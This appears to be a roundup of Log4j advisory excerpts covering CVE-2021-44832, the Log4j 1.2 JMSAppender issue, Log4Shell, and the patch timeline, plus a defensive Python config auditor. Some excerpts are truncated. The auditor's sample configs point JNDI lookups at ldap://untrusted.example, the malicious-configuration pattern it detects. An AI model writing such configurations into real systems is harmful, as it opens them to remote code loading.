Log4j 2.17.1 Released for CVE-2021-44832

NOTE: 12/30 IPS signature information added.

FortiGuard Labs is aware of a newly disclosed remote code execution vulnerability affecting Log4j. Assigned CVE-2021-44832, this vulnerability allows for a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can execute remote code.

There has been confusion on Twitter as to whether this is actually a remote code execution (RCE) or arbitrary code execution (ACE) vulnerability. Researcher Yaniv Nizry (@YNizry) initially stated today that a new RCE vulnerability related to Log4j was to be announced, and later retracted that initial statement, confirming that it is indeed arbitrary code execution and not remote code execution. Compounding matters, Apache classifies CVE-2021-44832 as a remote code execution vulnerability. In the writeup for CVE-2021-44832, Apache states that the atta..

JMSAppender – Log4j 1.2 Vulnerability CVE-2021-4104

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default.
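Both CVE-2021-44832 (a Log4j 2.x JDBC Appender whose DataSource is resolved through JNDI) and CVE-2021-4104 (a Log4j 1.2 JMSAppender with JNDI binding names) are only reachable through the logging configuration, so a defender can audit configuration files directly for those patterns. The following is an added example, not code from the original advisory or from Apache; the two configuration samples are constructed, and the host names in them are placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Constructed Log4j 2.x XML config: a JDBC appender whose DataSource
# is looked up via JNDI (the CVE-2021-44832 configuration pattern).
LOG4J2_XML = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT"/>
    <JDBC name="db" tableName="logs">
      <DataSource jndiName="ldap://untrusted.example/x"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
</Configuration>"""

# Constructed Log4j 1.2 properties config using JMSAppender with
# JNDI binding names (the CVE-2021-4104 configuration pattern).
LOG4J1_PROPS = """log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicBindingName=ldap://untrusted.example/topic
log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://untrusted.example/cf
"""

def find_jdbc_jndi_datasources(xml_text):
    """Return (appender name, jndiName) for every DataSource under a JDBC appender."""
    root = ET.fromstring(xml_text)
    hits = []
    for jdbc in root.iter():
        if jdbc.tag.lower() != "jdbc":          # Log4j plugin names are case-insensitive
            continue
        for ds in jdbc.iter():
            if ds.tag.lower() == "datasource" and ds.get("jndiName") is not None:
                hits.append((jdbc.get("name"), ds.get("jndiName")))
    return hits

JNDI_PROPS = ("TopicBindingName", "TopicConnectionFactoryBindingName")

def find_jms_appenders(props_text):
    """Return {appender name: properties} for JMSAppenders that set JNDI binding names."""
    appenders = {}
    for line in props_text.splitlines():
        m = re.match(r"log4j\.appender\.([^.=]+)(?:\.([^=]+))?=(.*)", line.strip())
        if not m:
            continue
        name, prop, value = m.groups()
        entry = appenders.setdefault(name, {})
        entry["class" if prop is None else prop] = value.strip()
    return {n: e for n, e in appenders.items()
            if e.get("class", "").endswith("JMSAppender")
            and any(p in e for p in JNDI_PROPS)}
```

A hit from either function means the file is only as trustworthy as whoever can write it; the upgrade paths listed in this advisory remove the JNDI lookup from the appender itself.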

This table will cover the Apache Log4j 1.2 vulnerability impacting the SonicWall products.

Apache Log4j Remote Code Execution Vulnerability – “Log4Shell” CVE-2021-44228, CVE-2021-45046, CVE-2021-45105

This advisory will cover the Apache Log4j suite of vulnerabilities impacting the 2.x branch, CVE-2021-44228 being the most critical (CVSS 10.0).

  • On December 10, 2021, Apache released Log4j 2.15.0 for Java 8 users to address a remote code execution (RCE) vulnerability, CVE-2021-44228.
  • On December 13, 2021, Apache released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address an RCE vulnerability, CVE-2021-45046.
  • On December 17, 2021, Apache released Log4j 2.17.0 for Java 8 users to address a denial-of-service (DoS) vulnerability, CVE-2021-45105.
  • On December 28, 2021, Apache released Log4j 2.17.1 for Java 8 users to address an RCE vulnerability, CVE-2021-44832.
